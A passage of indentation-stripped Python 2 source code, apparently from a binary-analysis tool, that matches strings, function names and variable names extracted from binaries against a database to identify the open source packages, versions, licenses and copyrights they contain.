reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), uniques)
minprocessamount = min(len(uniques), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], language, 'string'))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## for each combination (line,sha256,linenumber) store per checksum
## the line and linenumber(s). The checksums are used to look up version
## and filename information.
sha256_scan_versions = {}
tmplines = {}
for l in vsha256s:
(line, versionsha256s) = l
for s in versionsha256s:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((line, linenumber))
else:
sha256_scan_versions[checksum] = set([(line, linenumber)])
else:
## results are already know, so copy
for v in sha256_versions[checksum]:
(version, filename) = v
if not line in tmplines:
tmplines[line] = []
tmplines[line].append((checksum, linenumber, sha256_versions[checksum]))
processpool = []
fileres = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
resdict = {}
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(line, linenumber) = l
if not line in tmplines:
tmplines[line] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[line].append((checksum, linenumber, versres))
for v in versres:
(version, filename) = v
if checksum in sha256_versions:
sha256_versions[checksum].append((version, filename))
else:
sha256_versions[checksum] = [(version, filename)]
for l in tmplines.keys():
newuniques.append((l, tmplines[l]))
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
## optionally fill two lists with sha256 for license schanning and copyright scanning
licensesha256s = []
copyrightsha256s = []
for u in newuniques:
versionsha256s = u[1]
vseen = set()
if determinelicense:
licensesha256s += map(lambda x: x[0], versionsha256s)
if determinecopyright:
copyrightsha256s += map(lambda x: x[0], versionsha256s)
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
for v in versionfilenames:
(version, filename) = v
if version in vseen:
continue
if version in newpackageversions:
newpackageversions[version] = newpackageversions[version] + 1
else:
newpackageversions[version] = 1
vseen.add(version)
## Ideally the version number should be stored with the license.
## There are good reasons for this: files are sometimes collectively
## relicensed when there is a new release (example: Samba 3.2 relicensed
## to GPLv3+) so the version number can be very significant for licensing.
## determinelicense and determinecopyright *always* imply determineversion
## TODO: store license with version number.
if determinelicense:
if len(licensesha256s) != 0:
licensesha256s = set(licensesha256s)
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), licensesha256s)
minprocessamount = min(len(licensesha256s), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_license, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_license_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
packagelicenses.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
packagelicenses_tmp = []
for p in packagelicenses:
packagelicenses_tmp += reduce(lambda x,y: x + y, p.values(), [])
packagelicenses = list(set(packagelicenses_tmp))
if determinecopyright:
if len(copyrightsha256s) != 0:
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), copyrightsha256s)
minprocessamount = min(len(copyrightsha256s), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_copyright, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_copyright_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
packagecopyrights.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## result is a list of {sha256sum: list of copyright statements}
packagecopyrights_tmp = []
for p in packagecopyrights:
packagecopyrights_tmp += reduce(lambda x,y: x + y, p.values(), [])
packagecopyrights = list(set(packagecopyrights_tmp))
#newreports.append((rank, package, newuniques, uniquematcheslen, percentage, newpackageversions, packagelicenses, packagecopyrights))
newreports.append({'rank': rank, 'package': package, 'unique': newuniques, 'uniquematcheslen': uniquematcheslen, 'percentage': percentage, 'packageversions': newpackageversions, 'packagelicenses': packagelicenses, 'packagecopyrights': packagecopyrights})
res['reports'] = newreports
## Then process the results for the function names
if 'versionresults' in functionRes:
for package in functionRes['versionresults'].keys():
if not 'uniquepackages' in functionRes:
continue
if not package in functionRes['uniquepackages']:
continue
changed = True
functionnames = functionRes['uniquepackages'][package]
## right now only C is supported. TODO: fix this for other languages such as Java.
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), functionnames)
minprocessamount = min(len(functionnames), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], 'C', 'function'))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
sha256_scan_versions = {}
tmplines = {}
for p in vsha256s:
(functionname, vres) = p
for s in vres:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((functionname, linenumber))
else:
sha256_scan_versions[checksum] = set([(functionname, linenumber)])
else:
for v in sha256_versions[checksum]:
(version, filename) = v
if not functionname in tmplines:
tmplines[functionname] = []
tmplines[functionname].append((checksum, linenumber, sha256_versions[checksum]))
fileres = []
if len(sha256_scan_versions.keys()) != 0:
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
resdict = {}
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(functionname, linenumber) = l
if not functionname in tmplines:
tmplines[functionname] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[functionname].append((checksum, linenumber, versres))
for v in versres:
if checksum in sha256_versions:
sha256_versions[checksum].append((v[0], v[1]))
else:
sha256_versions[checksum] = [(v[0], v[1])]
for l in tmplines.keys():
functionRes['versionresults'][package].append((l, tmplines[l]))
newresults = {}
for package in functionRes['versionresults'].keys():
newuniques = functionRes['versionresults'][package]
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
newresults[package] = newuniques
uniqueversions = {}
functionRes['packages'][package] = []
if have_counter:
vs = collections.Counter()
else:
vs = {}
for u in newuniques:
versionsha256s = u[1]
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
if have_counter:
vs.update(set(map(lambda x: x[0], versionfilenames)))
else:
for v in set(map(lambda x: x[0], versionfilenames)):
if v in vs:
vs[v] += 1
else:
vs[v] = 1
for v in vs:
functionRes['packages'][package].append((v, vs[v]))
functionRes['versionresults'] = newresults
## Then process the results for the variable names
if variablepvs != {}:
if language == 'C':
if 'uniquepackages' in variablepvs:
if variablepvs['uniquepackages'] != {}:
changed = True
for package in variablepvs['uniquepackages']:
vartype = 'variable'
if 'type' in variablepvs:
vartype = 'variable'
if variablepvs['type'] == 'linuxkernel':
vartype = 'kernelvariable'
uniques = variablepvs['uniquepackages'][package]
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), uniques)
minprocessamount = min(len(uniques), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], language, vartype))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
sha256_scan_versions = {}
tmplines = {}
for p in vsha256s:
(variablename, varres) = p
for s in varres:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((variablename, linenumber))
else:
sha256_scan_versions[checksum] = set([(variablename, linenumber)])
else:
for v in sha256_versions[checksum]:
(version, filename) = v
if not variablename in tmplines:
tmplines[variablename] = []
tmplines[variablename].append((checksum, linenumber, sha256_versions[checksum]))
resdict = {}
if len(sha256_scan_versions.keys()) != 0:
processpool = []
fileres = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(variablename, linenumber) = l
if not variablename in tmplines:
tmplines[variablename] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[variablename].append((checksum, linenumber, versres))
for v in versres:
if checksum in sha256_versions:
sha256_versions[checksum].append((v[0], v[1]))
else:
sha256_versions[checksum] = [(v[0], v[1])]
for l in tmplines.keys():
variablepvs['versionresults'][package].append((l, tmplines[l]))
newresults = {}
for package in variablepvs['versionresults'].keys():
newuniques = variablepvs['versionresults'][package]
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
newresults[package] = newuniques
uniqueversions = {}
variablepvs['packages'][package] = []
if have_counter:
vs = collections.Counter()
else:
vs = {}
for u in newuniques:
versionsha256s = u[1]
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
if have_counter:
vs.update(set(map(lambda x: x[0], versionfilenames)))
else:
for v in set(map(lambda x: x[0], versionfilenames)):
if v in vs:
vs[v] += 1
else:
vs[v] = 1
for v in vs:
variablepvs['packages'][package].append((v, vs[v]))
variablepvs['versionresults'] = newresults
if changed:
leafreports['ranking'] = (res, functionRes, variablepvs, language)
leafreports['tags'] = list(set(leafreports['tags'] + ['ranking']))
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
unpackreport['tags'].append('ranking')
## finally shut down the scan manager
scanmanager.shutdown()
## grab variable names.
def grab_sha256_varname(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
c.execute(query, (sha256sum,))
results = c.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
def grab_sha256_filename(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
## grab copyright statements from the license database
def grab_sha256_copyright(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
## 'statements' are not very accurate so ignore those
results = filter(lambda x: x[1] != 'statement', results)
reportqueue.put({sha256sum: results})
scanqueue.task_done()
## grab licenses from the license database
def grab_sha256_license(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
def grab_sha256_parallel(scanqueue, reportqueue, cursor, conn, language, querytype):
stringquery = "select distinct checksum, linenumber, language from extracted_string where stringidentifier=%s and language=%s"
functionquery = "select distinct checksum, linenumber, language from extracted_function where functionname=%s"
variablequery = "select distinct checksum, linenumber, language, type from extracted_name where name=%s"
kernelvarquery = "select distinct checksum, linenumber, language, type from extracted_name where name=%s"
while True:
res = None
line = scanqueue.get(timeout=2592000)
if querytype == "string":
cursor.execute(stringquery, (line,language))
res = cursor.fetchall()
elif querytype == 'function':
cursor.execute(functionquery, (line,))
res = cursor.fetchall()
elif querytype == 'variable':
cursor.execute(variablequery, (line,))
res = cursor.fetchall()
res = filter(lambda x: x[3] == 'variable', res)
elif querytype == 'kernelvariable':
cursor.execute(kernelvarquery, (line,))
res = cursor.fetchall()
res = filter(lambda x: x[3] == 'kernelsymbol', res)
conn.commit()
if res != None:
res = filter(lambda x: x[2] == language, res)
## TODO: make a list of line numbers
res = map(lambda x: (x[0], x[1]), res)
reportqueue.put((line, res))
scanqueue.task_done()
def extractJava(javameta, scanenv, funccursor, funcconn, clones):
dynamicRes = {} # {'namesmatched': 0, 'totalnames': int, 'uniquematches': int, 'packages': {} }
namesmatched = 0
uniquematches = 0
uniquepackages = {}
variablepvs = {}
if 'fields' in javameta:
fields = javameta['fields']
else:
fields = []
if 'classes' in javameta:
classes = javameta['classes']
else:
classes = []
if 'sourcefiles' in javameta:
sourcefiles = javameta['sourcefiles']
else:
sourcefiles = []
classname = javameta['classes']
methods = javameta['methods']
fields = javameta['fields']
sourcefile = javameta['sourcefiles']
if 'BAT_METHOD_SCAN' in scanenv:
query = "select distinct package from functionnamecache_java where functionname=%s"
for meth in methods:
if meth == 'main':
continue
funccursor.execute(query, (meth,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
namesmatched += 1
packages_tmp = []
for r in res:
if r[0] in clones:
package_tmp = clones[r[0]]
packages_tmp.append(package_tmp)
else:
packages_tmp.append(r[0])
packages_tmp = list(set(packages_tmp))
## unique match
if len(packages_tmp) == 1:
uniquematches += 1
if packages_tmp[0] in uniquepackages:
uniquepackages[packages_tmp[0]].append(meth)
else:
uniquepackages[packages_tmp[0]] = [meth]
dynamicRes['namesmatched'] = namesmatched
dynamicRes['totalnames'] = len(set(methods))
dynamicRes['uniquepackages'] = uniquepackages
dynamicRes['uniquematches'] = uniquematches
## unique matches found.
if uniquematches != 0:
dynamicRes['packages'] = {}
## Now variable names
classpvs = {}
sourcepvs = {}
fieldspvs = {}
## classes and source file names are searched in a similar way.
## Of course, it could be that the source file is different from the
## class file (apart from the extension of course) but this is very
## uncommon. TODO: merge class name and source file name searching
if 'BAT_CLASSNAME_SCAN' in scanenv:
classes = set(map(lambda x: x.split('$')[0], classes))
query = "select package from classcache_java where classname=%s"
for i in classes:
pvs = []
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
classname = i
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
if classres == []:
## check just the last component
classname = classname.split('.')[-1]
classres = funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
## check the cloning database
if classres != []:
classres_tmp = []
for r in classres:
if r[0] in clones:
class_tmp = clones[r[0]]
classres_tmp.append(class_tmp)
else:
classres_tmp.append(r[0])
classres_tmp = list(set(classres_tmp))
classres = map(lambda x: (x, 0), classres_tmp)
classpvs[classname] = classres
for i in javameta['sourcefiles']:
pvs = []
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
if i.lower().endswith('.java'):
classname = i[0:-5]
else:
classname = i
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
## check the cloning database
if classres != []:
classres_tmp = []
for r in classres:
if r[0] in clones:
class_tmp = clones[r[0]]
classres_tmp.append(class_tmp)
else:
classres_tmp.append(r[0])
classres_tmp = set(classres_tmp)
classres = map(lambda x: (x, 0), classres_tmp)
sourcepvs[classname] = classres
## A list of Java fields that should be ignored
ignorefields = set(['value', 'name', 'type', 'data', 'options', 'parent', 'description', 'instance', 'port', 'out', 'properties', 'project', 'next', 'id', 'listeners', 'status', 'target', 'result', 'index', 'buffer', 'values', 'count', 'size', 'key', 'path', 'cache', 'map', 'file', 'context', 'initialized', 'verbose', 'version', 'debug', 'message', 'attributes', 'url', 'DEBUG', 'NAME', 'state', 'source', 'password', 'text', 'start', 'factory', 'entries', 'buf', 'args', 'logger', 'config', 'length', 'encoding', 'method', 'resources', 'timeout', 'filename', 'offset', 'server', 'mode', 'in', 'connection'])
## Keep a list of which sha256s were already seen. Since the files are
## likely only coming from a few packages there is no need to hit the database
## that often.
sha256cache = {}
if 'BAT_FIELDNAME_SCAN' in scanenv:
query = "select package from fieldcache_java where fieldname=%s"
for f in fields:
## a few fields are so common that they will be completely useless
## for reporting, but processing them will take a *lot* of time, so
## just skip them. This list is based on research of many many Java
## source code files.
if f in ignorefields:
continue
pvs = []
funccursor.execute(query, (f,))
fieldres = funccursor.fetchall()
funcconn.commit()
if fieldres != []:
fieldres_tmp = []
for r in fieldres:
if r[0] in clones:
field_tmp = clones[r[0]]
fieldres_tmp.append(field_tmp)
else:
fieldres_tmp.append(r[0])
fieldres_tmp = set(fieldres_tmp)
fieldres = map(lambda x: (x, 0), fieldres_tmp)
fieldspvs[f] = fieldres
variablepvs['fields'] = fieldspvs
variablepvs['sources'] = sourcepvs
variablepvs['classes'] = classpvs
## these are the unique function names only, just add some stubs here
for i in uniquepackages:
versions = []
dynamicRes['packages'][i] = []
return (dynamicRes, variablepvs)
def scankernelsymbols(variables, scanenv, kernelquery, funccursor, funcconn, clones):
allvvs = {}
uniquevvs = {}
variablepvs = {}
for v in variables:
pvs = []
funccursor.execute(kernelquery, (v,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
pvs = map(lambda x: x[0], res)
pvs_tmp = []
for r in pvs:
if r in clones:
pvs_tmp.append(clones[r])
else:
pvs_tmp.append(r)
if len(pvs_tmp) == 1:
if pvs_tmp[0] in uniquevvs:
uniquevvs[pvs_tmp[0]].append(v)
else:
uniquevvs[pvs_tmp[0]] = [v]
allvvs[v] = pvs_tmp
variablepvs = {'uniquepackages': uniquevvs, 'allvariables': allvvs}
variablepvs['packages'] = {}
variablepvs['versionresults'] = {}
variablepvs['type'] = 'linuxkernel'
for package in uniquevvs:
variablepvs['versionresults'][package] = []
variablepvs['packages'][package] = []
return variablepvs
## From dynamically linked ELF files it is possible to extract the dynamic
## symbol table. This table lists the functions and variables which are needed
## from external libraries, but also lists local functions and variables.
## By searching a database that contains which function names and variable names
## can be found in which packages it is possible to identify which package was
## used.
def scanDynamic(scanstr, variables, scanenv, funccursor, funcconn, clones):
dynamicRes = {}
variablepvs = {}
if not ('BAT_FUNCTION_SCAN' in scanenv or 'BAT_VARNAME_SCAN' in scanenv):
return (dynamicRes, variablepvs)
if 'BAT_FUNCTION_SCAN' in scanenv:
uniquepackages = {}
namesmatched = 0
uniquematches = 0
## caching datastructure, only needed in case there is no full cache
sha256_packages = {}
## the database made from ctags output only has function names, not the types. Since
## C++ functions could be in an executable several times with different types we
## deduplicate first
query = "select package from functionnamecache_c where functionname=%s"
for funcname in scanstr:
funccursor.execute(query, (funcname,))
res = funccursor.fetchall()
funcconn.commit()
pkgs = []
if res != []:
packages_tmp = []
for r in res:
if r[0] in clones:
package_tmp = clones[r[0]]
packages_tmp.append(package_tmp)
else:
packages_tmp.append(r[0])
packages_tmp = list(set(packages_tmp))
namesmatched += 1
## unique match
if len(packages_tmp) == 1:
uniquematches += 1
if packages_tmp[0] in uniquepackages:
uniquepackages[packages_tmp[0]] += [funcname]
else:
uniquepackages[packages_tmp[0]] = [funcname]
dynamicRes['namesmatched'] = namesmatched
dynamicRes['uniquepackages'] = uniquepackages
dynamicRes['totalnames'] = len(scanstr)
## unique matches found.
dynamicRes['uniquematches'] = uniquematches
if uniquematches != 0:
dynamicRes['packages'] = {}
dynamicRes['versionresults'] = {}
## these are the unique function names only
## TODO: here versions for function names were computed. This needs clean ups.
for package in uniquepackages:
versions = []
dynamicRes['versionresults'][package] = []
dynamicRes['packages'][package] = []
for v in set(versions):
dynamicRes['packages'][package].append((v, versions.count(v)))
## Scan C variables extracted from dynamically linked files.
if scanenv.get('BAT_VARNAME_SCAN'):
ignorevariables = set(['options', 'debug', 'options', 'verbose', 'optarg', 'optopt', 'optfind', 'optind', 'opterr'])
## keep two mappings:
## 1. unique variable names per package
## 2. package per variable name
uniquevvs = {}
allvvs = {}
query = "select distinct package from varnamecache_c where varname=%s"
for v in variables:
## These variable names are very generic and would not be useful, so skip.
## This is based on research of millions of C files.
if v in ignorevariables:
continue
pvs = []
funccursor.execute(query, (v,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
pvs = map(lambda x: x[0], res)
pvs_tmp = []
for r in pvs:
if r in clones:
pvs_tmp.append(clones[r])
else:
pvs_tmp.append(r)
if len(pvs_tmp) == 1:
if pvs_tmp[0] in uniquevvs:
uniquevvs[pvs_tmp[0]].append(v)
else:
uniquevvs[pvs_tmp[0]] = [v]
allvvs[v] = pvs_tmp
variablepvs = {'uniquepackages': uniquevvs, 'allvariables': allvvs}
variablepvs['packages'] = {}
variablepvs['versionresults'] = {}
for package in uniquevvs:
variablepvs['versionresults'][package] = []
variablepvs['packages'][package] = []
return (dynamicRes, variablepvs)
## match identifiers with data in the database
## First match string literals, then function names and variable names for various languages
def lookup_identifier(scanqueue, reportqueue, cursor, conn, scanenv, topleveldir, avgscores, clones, scandebug, unmatchedignorecache, lock):
## first some things that are shared between all scans
if 'BAT_STRING_CUTOFF' in scanenv:
try:
stringcutoff = int(scanenv['BAT_STRING_CUTOFF'])
except:
stringcutoff = 5
else:
stringcutoff = 5
## TODO: this should be done per language
if 'BAT_SCORE_CACHE' in scanenv:
precomputescore = True
else:
precomputescore = False
usesourceorder = False
if 'USE_SOURCE_ORDER' in scanenv:
usesourceorder = True
## don't use precomputed scores when using source order
precomputescore = False
## default parameters for scoring
alpha = 5.0
scorecutoff = 1.0e-20
gaincutoff = 1
kernelquery = "select package FROM linuxkernelfunctionnamecache WHERE functionname=%s LIMIT 1"
precomputequery = "select score from scores where stringidentifier=%s LIMIT 1"
while True:
## get a new task from the queue
(filehash, filename) = scanqueue.get(timeout=2592000)
## read the pickle with the data
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if not 'identifier' in leafreports:
## If there is no relevant data to scan continue to the next file
scanqueue.task_done()
continue
if leafreports['identifier'] == {}:
## If there is no relevant data to scan continue to the next file
scanqueue.task_done()
continue
## grab the lines extracted earlier
lines = leafreports['identifier']['strings']
language = leafreports['identifier']['language']
## this should of course not happen, but hey...
scanlines = True
if not language in scanenv['supported_languages']:
scanlines = False
if lines == None:
lenlines = 0
scanlines = False
else:
lenlines = len(lines)
linuxkernel = False
scankernelfunctions = False
if 'linuxkernel' in leafreports['tags']:
linuxkernel = True
if scanenv.get('BAT_KERNELFUNCTION_SCAN') == 1 and language == 'C':
scankernelfunctions = True
## first compute the score for the lines
if lenlines != 0 and scanlines:
## keep a dict of versions, license and copyright statements per package. TODO: remove these.
packageversions = {}
packagelicenses = {}
packagecopyrights = {}
if have_counter:
linecount = collections.Counter(lines)
else:
linecount = {}
for l in lines:
if l in linecount:
linecount[l] += 1
else:
linecount[l] = 1
## first look up and assign strings for as far as possible.
## strings that have not been assigned will be assigned later based
## on their score.
## Look up strings in the database and assign strings to packages.
uniqueMatches = {}
nonUniqueScore = {}
stringsLeft = {}
sameFileScore = {}
nonUniqueMatches = {}
nonUniqueMatchLines = []
nonUniqueAssignments = {}
directAssignedString = {}
unmatched = []
ignored = []
#unmatchedignorecache = set()
kernelfuncres = []
kernelparamres = []
if scandebug:
print >>sys.stderr, "total extracted strings for %s: %d" % (filename, lenlines)
## some counters for keeping track of how many matches there are
matchedlines = 0
unmatchedlines = 0
matchednotclonelines = 0
matchednonassignedlines = 0
matcheddirectassignedlines = 0
nrUniqueMatches = 0
## start values for some state variables that are used
## most of these are only used if 'usesourceorder' == False
matched = False
matchednonassigned = False
matchednotclones = False
kernelfunctionmatched = False
uniquematch = False
oldline = None
notclones = []
if usesourceorder:
## keep track of which package was the most uniquely matched package
uniquepackage_tmp = None
uniquefilenames_tmp = []
## keep a backlog for strings that could possibly be assigned later
backlog = []
notclonesbacklog = []
else:
## sort the lines first, so it is easy to skip duplicates
lines.sort()
stringquery = "select package, filename FROM %s WHERE stringidentifier=" % stringsdbperlanguagetable[language] + "%s"
for line in lines:
#if scandebug:
# print >>sys.stderr, u"processing <|%s|>" % line
kernelfunctionmatched = False
if not usesourceorder:
## speedup if the line happens to be the same as the old one
## This does *not* alter the score in any way, but perhaps
## it should: having a very significant string a few times
## is a strong indication.
if line == oldline:
if matched:
matchedlines += 1
if uniquematch:
nrUniqueMatches += 1
#uniqueMatches[package].append((line, []))
elif matchednonassigned:
linecount[line] = linecount[line] - 1
matchednonassignedlines += 1
elif matchednotclones:
linecount[line] = linecount[line] - 1
matchednotclonelines += 1
else:
unmatchedlines += 1
linecount[line] = linecount[line] - 1
continue
uniquematch = False
matched = False
matchednonassigned = False
matchednotclones = False
oldline = line
## skip empty lines (only triggered if stringcutoff == 0)
if line == "":
continue
lock.acquire()
if line in unmatchedignorecache:
lock.release()
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
continue
lock.release()
if len(line) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
## An extra check for lines that score extremely low. This
## helps reduce load on databases stored on slower disks. Only used if
## precomputescore is set and "source order" is False.
if precomputescore:
cursor.execute(precomputequery, (line,))
scoreres = cursor.fetchone()
conn.commit()
if scoreres != None:
## If the score is so low it will not have any influence on the final
## score, why even bother hitting the disk?
## Since there might be package rewrites this should be a bit less than the
## cut off value that was defined.
if scoreres[0] < scorecutoff/100:
nonUniqueMatchLines.append(line)
matchednonassignedlines += 1
matchednonassigned = True
linecount[line] = linecount[line] - 1
continue
## if scoreres is None the line could still be something else like a kernel function, or a
## kernel string in a different format, so keep searching.
## If the image is a Linux kernel image first try Linux kernel specific matching
## like function names, then continue as normal.
if linuxkernel:
## This is where things get a bit ugly. The strings in a Linux
## kernel image could also be function names, not string constants.
## There could be false positives here...
if scankernelfunctions:
cursor.execute(kernelquery, (line,))
kernelres = cursor.fetchall()
conn.commit()
if len(kernelres) != 0:
kernelfuncres.append(line)
kernelfunctionmatched = True
linecount[line] = linecount[line] - 1
continue
## then see if there is anything in the cache at all
try:
cursor.execute(stringquery, (line,))
except:
conn.commit()
## something weird is going on here, probably
## with encodings, so just ignore the line for
## now.
## One example is com.addi_40_src/src/com/addi/toolbox/crypto/aes.java
## from F-Droid. At line 221 there is a string SS.
## This string poses a problem.
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
lock.acquire()
unmatchedignorecache[line] = 1
lock.release()
continue
res = cursor.fetchall()
conn.commit()
if len(res) == 0 and linuxkernel:
## make a copy of the original line
origline = line
## try a few variants that could occur in the Linux kernel
## The values of KERN_ERR and friends have changed in the years.
## In 2.6 it used to be for example <3> (defined in include/linux/kernel.h
## or include/linux/printk.h )
## In later kernels this was changed.
matchres = reerrorlevel.match(line)
if matchres != None:
scanline = line.split('>', 1)[1]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
line = scanline
else:
scanline = scanline.split(':', 1)
if len(scanline) > 1:
scanline = scanline[1]
if scanline.startswith(" "):
scanline = scanline[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
else:
## In include/linux/kern_levels.h since kernel 3.6 a different format is
## used. TODO: actually check in the binary whether or not a match (if any)
## is preceded by 0x01
matchres = rematch.match(line)
if matchres != None:
scanline = line[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
if len(res) == 0:
scanline = line.split(':', 1)
if len(scanline) > 1:
scanline = scanline[1]
if scanline.startswith(" "):
